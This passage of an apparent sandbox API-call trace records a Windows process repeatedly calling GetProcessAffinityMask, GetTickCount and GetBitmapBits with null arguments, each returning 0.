GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.276] GetTickCount () returned 0x202a4c7 [0252.276] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.277] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.277] GetTickCount () returned 0x202a4c7 [0252.277] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.277] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.277] GetTickCount () returned 0x202a4c7 [0252.277] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.277] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.277] GetTickCount () returned 0x202a4c7 [0252.277] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.277] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.277] GetTickCount () returned 0x202a4c7 [0252.277] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.277] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.277] GetTickCount () returned 0x202a4c7 [0252.277] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.277] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.277] GetTickCount () returned 0x202a4c7 [0252.277] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.277] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.277] GetTickCount () returned 0x202a4c7 [0252.277] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.277] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.277] GetTickCount () returned 0x202a4c7 [0252.277] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.277] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.278] GetTickCount () returned 0x202a4c7 [0252.278] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.278] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.278] GetTickCount () returned 0x202a4c7 Thread: id = 147 os_tid = 0xb2c